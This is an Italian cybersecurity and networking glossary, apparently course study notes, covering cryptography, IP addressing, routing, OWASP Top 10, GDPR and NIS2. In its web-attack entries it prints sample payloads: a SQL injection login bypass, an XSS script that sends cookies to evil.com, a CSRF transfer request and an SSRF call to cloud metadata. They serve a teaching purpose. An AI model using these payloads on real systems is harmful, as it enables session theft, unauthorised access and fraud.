Identificatore pubblico univoco per ogni vulnerabilità nota. Formato: CVE-ANNO-NUMERO (es. CVE-2021-44228 = Log4Shell). Database ufficiale: NVD (National Vulnerability Database) del NIST.

Punteggio 0–10 che valuta la gravità di una CVE. Considera: vettore d'attacco, complessità, privilegi richiesti, impatto su riservatezza, integrità e disponibilità.

Vulnerabilità scoperta e sfruttabile per cui NON esiste ancora una patch.

1. Vulnerabilità scoperta
2. Segnalazione → apertura CVE
3. Il produttore sviluppa la patch
4. Patch distribuita e installata

SOC (Security Operations Center): unità H24/365 per monitoraggio, threat detection, incident response e threat intelligence.

CISO (Chief Information Security Officer): responsabile della strategia di sicurezza. Riporta al CEO/CTO. Definisce policy, budget e compliance (GDPR, ISO 27001).

Processo continuo: inventario asset → scansione CVE → prioritizzazione CVSS → test staging → deploy → verifica.

Un circuito booleano è una rete di porte logiche (gate) che implementano operazioni su bit (0/1) — il fondamento di ogni sistema digitale.

La subnet mask funziona con un AND bit a bit tra IP e maschera → risultato = indirizzo di rete.

IP:    192.168.1.10  →  11000000.10101000.00000001.00001010
Mask:  255.255.255.0  →  11111111.11111111.11111111.00000000
AND:   192.168.1.0   →  11000000.10101000.00000001.00000000

Bit mask=1 → parte RETE (fissa)
Bit mask=0 → parte HOST (variabile)

Funzione UNIDIREZIONALE: trasforma dati di qualsiasi dimensione in una stringa fissa di caratteri esadecimali. Dall'hash è computazionalmente impossibile risalire ai dati originali.

• Integrità file: confronta hash scaricato con quello ufficiale
• Password: hashate con SALT univoco → anche in caso di breach l'attaccante ha solo hash
• Blockchain: ogni blocco contiene l'hash del precedente → modificarlo invalida la catena

"ciao" → b94f6f125c79e3a5ffaa826f584c10d52ada669e6762051b826b55776d05a8df

Mittente e destinatario usano la stessa chiave per cifrare e decifrare. Veloce, adatta a grandi volumi di dati.

Coppia di chiavi matematicamente legate: chiave pubblica (distribuibile) e chiave privata (segreta). Ciò che cifra una, decifra solo l'altra.

Infrastruttura gerarchica che gestisce il ciclo di vita dei certificati digitali, garantendo l'autenticità delle chiavi pubbliche.

Protocollo che garantisce riservatezza, integrità e autenticazione nelle comunicazioni. SSL è il predecessore deprecato.

Handshake TLS 1.3 (semplificato): ClientHello → ServerHello + certificato → verifica CA → chiave di sessione ECDHE → dati cifrati AES-GCM.

Garantisce autenticità (chi ha firmato), integrità (il documento non è stato alterato) e non ripudio (il mittente non può negare).

1. Il mittente calcola l'hash del documento (es. SHA-256)
2. Cifra l'hash con la propria chiave privata → firma digitale
3. Il destinatario decifra la firma con la chiave pubblica del mittente
4. Confronta l'hash ottenuto con quello ricalcolato sul documento ricevuto

32 bit = 4 ottetti decimali separati da punti. Ogni ottetto: 0–255.

192   .  168   .    1   .   10
11000000.10101000.00000001.00001010

→ Parte di RETE  : determinata dalla subnet mask
→ Parte di HOST  : identifica il singolo dispositivo

IPv6: 128 bit, 8 gruppi esadecimali. 2001:db8::1 (:: = gruppi di zeri omessi)

Privati RFC 1918 (non instradati su Internet): 10.0.0.0/8 · 172.16.0.0/12 · 192.168.0.0/16

Speciali: 127.0.0.1 loopback · 169.254.x.x APIPA · 255.255.255.255 broadcast globale

Solo diagnostica e controllo — non trasporta dati utente.

• ping → Echo Request/Reply — verifica raggiungibilità
• traceroute → TTL Exceeded — mappa il percorso hop per hop
• Messaggi errore: Port Unreachable, Net Unreachable, Redirect

Traduce nomi di dominio in IP — la rubrica di Internet. UDP per query, TCP per zone transfer.

• A → dominio → IPv4 · AAAA → dominio → IPv6
• MX → mail server · CNAME → alias
• NS → nameserver autoritativo · PTR → IP → dominio (reverse)

Condivide directory tra sistemi Unix/Linux come se fossero dischi locali.

# Server — /etc/exports
/dati  192.168.1.0/24(rw,sync,no_root_squash)

# Client
mount -t nfs 192.168.1.5:/dati /mnt/condiviso

• NFS vs SMB: NFS = Linux/Unix · SMB (445) = Windows
• NFS vs SAN: NFS → FILE via IP · SAN → BLOCCHI via FC/iSCSI

Monitora dispositivi di rete. Componenti: NMS (manager) + Agent + MIB.

• v1/v2: community string in chiaro ❌
• v3: autenticazione + cifratura ✔

OID: 1.3.6.1.2.1.1.1.0 = iso.org.dod.internet.mgmt.mib-2.system.sysDescr

AND bit a bit tra IP e maschera → indirizzo di rete. CIDR (/xx) supera le classi A/B/C.

/16: 192.168.x.x si vedono tutti direttamente → router invisibile → rete flat.

/24: 192.168.1.x NON vede 192.168.2.x → passa dal gateway → separazione reti, DMZ, VLAN.

Punto di uscita della rete locale. Se un host vuole raggiungere un IP fuori dalla sua subnet, invia il pacchetto al gateway che decide come instradarlo.

Link-State: ogni router conosce la mappa completa. Algoritmo Dijkstra. Metrica: costo basato su bandwidth. Converge in secondi, no limite hop. Multicast 224.0.0.5. Standard enterprise.

router ospf 1
  network 192.168.1.0 0.0.0.255 area 0
  network 10.0.0.0 0.255.255.255 area 0

Distance Vector. Algoritmo Bellman-Ford. Metrica: hop count (max 15 — 16 = ∞). Aggiornamento ogni 30s, convergenza lenta (minuti).

Gestisce via software più link eterogenei (MPLS, broadband, LTE, 5G) in parallelo. Failover automatico, traffic shaping per applicazione, gestione centralizzata. Costo molto inferiore a MPLS dedicato.

Livelli: > User · # Privileged (enable) · (config)# Global config

show ip interface brief     ! stato interfacce
show ip route               ! routing table
show running-config         ! config attiva
show version                ! HW e versione IOS
no shutdown                 ! attiva interfaccia
ip route 10.0.0.0 255.255.0.0 192.168.1.1  ! rotta statica

Si interpone tra i client interni e Internet. Il server vede solo l'IP del proxy.

Client → [Forward Proxy] → Internet → Server

• Controllo accessi web, filtraggio contenuti, cache, logging

Davanti ai server backend. I client credono di parlare col server finale.

Client → Internet → [Reverse Proxy] → Server A
                                     → Server B

• Load balancing · SSL termination · Cache · WAF integrato

# nginx reverse proxy
server { listen 443 ssl; server_name miosito.com;
  location / { proxy_pass http://backend; } }
upstream backend { server 192.168.1.10:8080; server 192.168.1.11:8080; }

Gestisce accesso a FILE e DIRECTORY. r=read, w=write, x=execute. Deny-by-default.

alice → rw-   bob → r--   guest → ---

Filtra pacchetti su router/switch per IP, porta, protocollo. Standard: solo IP sorgente. Estesa: IP + porta + protocollo.

! Cisco IOS — ACL estesa numerata
access-list 101 permit ip 192.168.1.0 0.0.0.255 any
access-list 101 deny   ip 10.0.0.0 0.255.255.255 any
access-list 101 permit ip any any

CSV (Comma-Separated Values): formato testo per dati tabellari — universale per import/export, log, data science.

RAID 5 — 3 dischi:
D1: A1   D2: A2   D3: parità(A1 XOR A2)
D1: par  D2: B1   D3: B2   ← parità ruota

Il libretto Linux è un documento completo con 7 capitoli: introduzione, distribuzioni, filesystem, comandi shell, utenti e permessi, Bash scripting, networking. Ha la sua sidebar di navigazione e lo stesso stile di questo glossario.

Script Bash sviluppati durante lo stage formativo del Progetto GOL. Terminale interattivo con esecuzione simulata, codice sorgente e documentazione.

Analizza e filtra HTTP/HTTPS. Opera a Livello 7 — ispeziona il payload. Blocca: SQL Injection, XSS, CSRF, Path Traversal.

CA: emette certificati X.509. PKI: CA root → CA intermedie → certificati end-entity. CRL/OCSP: revoca.

Wildcard: *.dominio.com protegge tutti i sottodomini con un unico certificato.

• Honeypot: sistema vulnerabile usato come esca per studiare gli attaccanti
• Telnet (23): ❌ In chiaro — deprecato
• SSH (22): ✔ Cifrato — standard odierno
• Print Server: vettore di attacco laterale spesso trascurato

L'attaccante si interpone intercettando o alterando il traffico.

• ARP Poisoning · DNS Spoofing · SSL Stripping · Evil Twin

Contromisure: HTTPS+HSTS · certificati client · VPN · DNSSEC · 802.1X

Il social engineering manipola psicologicamente le persone per ottenere credenziali, accessi o informazioni riservate, sfruttando fiducia, urgenza e paura.

Cifra i file della vittima e chiede un riscatto (in criptovaluta) per la chiave di decifratura. Le varianti moderne usano doppia estorsione: cifra + esfiltrazione dati.

1. Infezione: phishing, RDP esposto, vulnerabilità non patchata, supply chain
2. Persistence & movimento laterale: si diffonde nella rete, eleva i privilegi
3. Esfiltrazione (RaaS moderno): copia dati verso server C&C dell'attaccante
4. Cifratura: AES per i file, RSA/ECC per proteggere la chiave AES
5. Riscatto: richiesta in Bitcoin/Monero con timer, minaccia di pubblicare i dati

DoS: un singolo attaccante satura le risorse del target. DDoS: migliaia di macchine (botnet) colpiscono simultaneamente.

L'attaccante inserisce codice SQL in un campo di input per manipolare le query del database — lettura, modifica, cancellazione dati o bypass autenticazione.

-- Input malevolo nel campo username:
' OR '1'='1

-- Query risultante:
SELECT * FROM users WHERE user='' OR '1'='1' AND pass='x'
-- Risultato: accede senza credenziali valide

Injection di codice JavaScript malevolo in una pagina web. Il browser della vittima esegue lo script nel contesto del sito legittimo → furto cookie, reindirizzamento, defacement.

<script>document.location='https://evil.com/?c='+document.cookie</script>
// Ruba i cookie di sessione e li invia all'attaccante

Forza l'utente autenticato a eseguire azioni indesiderate su un sito a cui è loggato, sfruttando la sessione già attiva nel browser.

<!-- Pagina malevola visitata dalla vittima loggata in banca: -->
<img src="https://banca.it/bonifico?dest=attaccante&importo=5000">
<!-- Il browser invia la richiesta con i cookie di sessione della banca -->

Differenza con XSS: XSS sfrutta fiducia del browser nell'utente. CSRF sfrutta fiducia del server nella sessione.

* MAU bypassa automaticamente il nodo guasto.

TOKEN = frame speciale che circola antiorario. Solo chi ha il token può trasmettere. Deterministico, no collisioni. Oggi obsoleto — sostituito da Ethernet.

Lista aggiornata delle vulnerabilità web più critiche. Riferimento standard mondiale.

L'app non verifica i permessi. Esempi: /admin via URL, IDOR (id=123→124), escalation verticale. Contromisure: deny-by-default, controlli lato server, minimo privilegio.

Cifratura assente o inadeguata. Esempi: password in chiaro, HTTP, MD5/SHA-1 per password, chiavi hardcoded. Contromisure: HTTPS+HSTS, bcrypt/Argon2+SALT, TLS 1.2/1.3.

Input non sanificato eseguito come codice.

SELECT * FROM users WHERE user='' OR '1'='1'
→ Bypassa autenticazione

Contromisure: prepared statements, validazione input, WAF.

Difetti architetturali e di progettazione — mancanza di threat modeling, assenza di security requirements, design pattern non sicuri. Non è un bug di implementazione ma di concezione.

Configurazioni di default non cambiate, porte/servizi inutili aperti, permessi eccessivi, messaggi di errore verbosi che rivelano informazioni interne.

• Credenziali di default su router/DB/applicazioni
• Directory listing attiva su web server
• CORS troppo permissivo (Access-Control-Allow-Origin: *)
• Debug mode attivo in produzione
• S3 bucket pubblici non intenzionali (AWS)

Librerie, framework e componenti con vulnerabilità note e non aggiornate. La supply chain software è un vettore di attacco crescente.

• Log4Shell (CVE-2021-44228) — Log4j usato in milioni di applicazioni Java
• SolarWinds — aggiornamento software conteneva backdoor
• npm packages malevoli — dependency confusion, typosquatting

Difetti nei meccanismi di autenticazione e gestione delle sessioni che permettono all'attaccante di impersonare altri utenti.

• Password deboli o senza rate limiting → brute force
• Session token predicibili o non invalidati dopo logout
• Mancanza di MFA su account critici
• Credenziali in chiaro in URL o log
• Gestione errata del "recupera password"

Codice o dati che vengono assunti integri senza verifica — pipeline CI/CD non sicure, update automatici non firmati, deserializzazione non sicura.

• Plugin/librerie scaricati senza verifica firma digitale
• Pipeline CI/CD con accesso write non protetto
• Deserializzazione di oggetti non attendibili → RCE
• Insecure auto-update (HTTP invece di HTTPS + firma)

Senza log adeguati, un attacco può passare inosservato per mesi. Il tempo medio di rilevamento di un breach è ancora superiore a 200 giorni.

• Login falliti non loggati → brute force invisibile
• Log senza timestamp affidabile o con dati insufficienti
• Assenza di SIEM o alert su eventi anomali
• Log non protetti → l'attaccante li cancella dopo il breach

L'attaccante forza il server a effettuare richieste HTTP verso risorse interne o esterne arbitrarie — bypassando firewall e accedendo a servizi cloud metadata.

# Esempio: parametro URL non validato
https://sito.it/fetch?url=http://169.254.169.254/latest/meta-data/
# → accede ai metadata AWS dalla rete interna del server

Framework di policy e tecnologie per garantire che le persone giuste accedano alle risorse giuste al momento giusto per le ragioni giuste.

L'autenticazione verifica l'identità. MFA (Multi-Factor Authentication) richiede almeno 2 fattori di categorie diverse.

Un'unica autenticazione dà accesso a più sistemi/applicazioni senza re-inserire le credenziali.

Principio del privilegio minimo (PoLP): ogni utente, processo o sistema deve avere solo i permessi strettamente necessari al proprio compito.

• Privilege creep: accumulo progressivo di permessi nel tempo (promozioni, cambio ruolo) senza revoca di quelli precedenti
• Separazione dei privilegi: nessun singolo account deve poter fare tutto
• Just-in-time (JIT): privilegi elevati concessi solo quando servono e per un tempo limitato
• PAM (Privileged Access Management): strumenti per gestire, monitorare e registrare l'uso di account privilegiati

Dispositivo o software che filtra il traffico di rete in base a regole (policy), controllando cosa entra e cosa esce dalla rete.

IDS (Intrusion Detection System): monitora e avvisa di attività sospette ma non blocca. IPS (Intrusion Prevention System): rileva e blocca in tempo reale.

Metodi di rilevamento: signature-based (pattern noti, bassa efficacia su 0-day) · anomaly-based (deviazione dal baseline, più efficace su attacchi nuovi) · stateful protocol analysis.

Crea un tunnel cifrato tra client e server VPN, proteggendo il traffico da intercettazioni e mascherando l'IP reale dell'utente.

Processo sistematico per identificare, classificare e prioritizzare le vulnerabilità in un sistema — senza sfruttarle.

1. Pianificazione: scope, asset da testare, finestre di manutenzione
2. Scansione: tool automatizzati (Nessus, OpenVAS, Nmap) identificano CVE
3. Analisi: eliminazione falsi positivi, classificazione per CVSS
4. Report: lista vulnerabilità con severità, impatto e remediation
5. Remediation & re-scan: verifica delle patch applicate

Simulazione controllata di un attacco reale — il pentester sfrutta le vulnerabilità per valutare l'impatto reale e la capacità di rilevamento/risposta.

Fasi (metodologia PTES/OWASP): Recon → Scanning → Exploitation → Post-exploitation → Reporting

Raccolta di informazioni sul target prima di qualsiasi interazione diretta — OSINT (Open Source Intelligence).

Regolamento europeo sulla protezione dei dati personali, in vigore dal 25 maggio 2018. Si applica a qualsiasi organizzazione che tratti dati di cittadini UE.

• Data breach: notifica all'Autorità (Garante) entro 72 ore
• Sanzioni: fino a €20M o 4% del fatturato globale annuo
• DPO (Data Protection Officer): obbligatorio per enti pubblici e grandi trattatori
• Diritti dell'interessato: accesso, rettifica, cancellazione (diritto all'oblio), portabilità, opposizione

Standard internazionale per la gestione della sicurezza delle informazioni (ISMS — Information Security Management System). Certificabile da enti accreditati.

• Basato sul ciclo PDCA (Plan-Do-Check-Act)
• Annesso A: 93 controlli di sicurezza organizzati in 4 domini (organizzativo, persone, fisico, tecnologico)
• Richiede risk assessment documentato e trattamento dei rischi
• Audit di certificazione + sorveglianza annuale + rinnovo ogni 3 anni

Framework volontario del NIST (National Institute of Standards and Technology) per gestire il rischio cyber. Versione 2.0 pubblicata nel 2024.

Aggiornamento della Direttiva NIS (2016), in vigore dal 2023 con recepimento entro ottobre 2024. Estende gli obblighi di sicurezza a molti più settori.

• Settori essenziali: energia, trasporti, banche, infrastrutture digitali, sanità, acqua, spazio
• Settori importanti: servizi postali, gestione rifiuti, produzione, fornitori digitali
• Obblighi: misure di gestione del rischio, notifica incidenti entro 24h (alert) e 72h (notifica completa)
• Responsabilità del management: gli organi direttivi rispondono personalmente
• Sanzioni: fino a €10M o 2% fatturato globale (settori essenziali)

7 principi fondanti (Ann Cavoukian): proattivo · privacy di default · privacy nel design · funzionalità totale · sicurezza end-to-end · visibilità · rispetto per la privacy utente.

Modelli di deployment: Public cloud (risorse condivise) · Private cloud (dedicato) · Hybrid (on-premise + cloud) · Multi-cloud (più provider).

Disciplina che raccoglie, preserva e analizza le prove digitali mantenendo la chain of custody (catena di custodia) per uso legale.

• Ordine di volatilità: raccogliere prima le prove più volatili (RAM → processi → connessioni → log → disco)
• Imaging forense: copia bit-per-bit del disco con hash MD5/SHA256 per verificare integrità
• Analisi artefatti: registry Windows, prefetch, log eventi, timestamp MACB (Modified, Accessed, Changed, Born)
• Timeline analysis: ricostruzione cronologica degli eventi
• Strumenti: Autopsy, FTK, Volatility (RAM), Sleuth Kit

Piattaforma che raccoglie, normalizza e correla log da tutta l'infrastruttura per rilevare minacce in tempo reale e supportare le indagini forensi.

Esempi: Splunk, IBM QRadar, Microsoft Sentinel, Elastic SIEM, Wazuh (open source).

Contromisure: MDM (Mobile Device Management) per dispositivi aziendali · aggiornamenti OS e app · store ufficiali · VPN aziendale · cifratura dispositivo · remote wipe.

I dispositivi IoT (telecamere, sensori, router, PLC industriali) sono spesso il punto di ingresso più debole delle reti aziendali e domestiche.

Caso Mirai Botnet (2016): 600.000 dispositivi IoT con credenziali di default compromessi → DDoS da 1.1 Tbps.

Contromisure: segmentazione VLAN IoT isolata · cambio credenziali di default · aggiornamenti firmware · disabilitare servizi inutili · network monitoring.

Il BCP comprende il DRP — il DRP è il sottopiano che gestisce il ripristino IT.

Disastro accade alle 14:00
Ultimo backup alle 12:00 → RPO = 2 ore (si perdono 2 ore di dati)
Sistemi ripristinati alle 18:00 → RTO = 4 ore

Regola 3-2-1: 3 copie dei dati · su 2 supporti diversi · di cui 1 offsite (fuori sede).

Tecniche avanzate: mirroring (sincrono, RPO≈0) · snapshot · replicazione asincrona · backup immutabile (WORM — Write Once Read Many).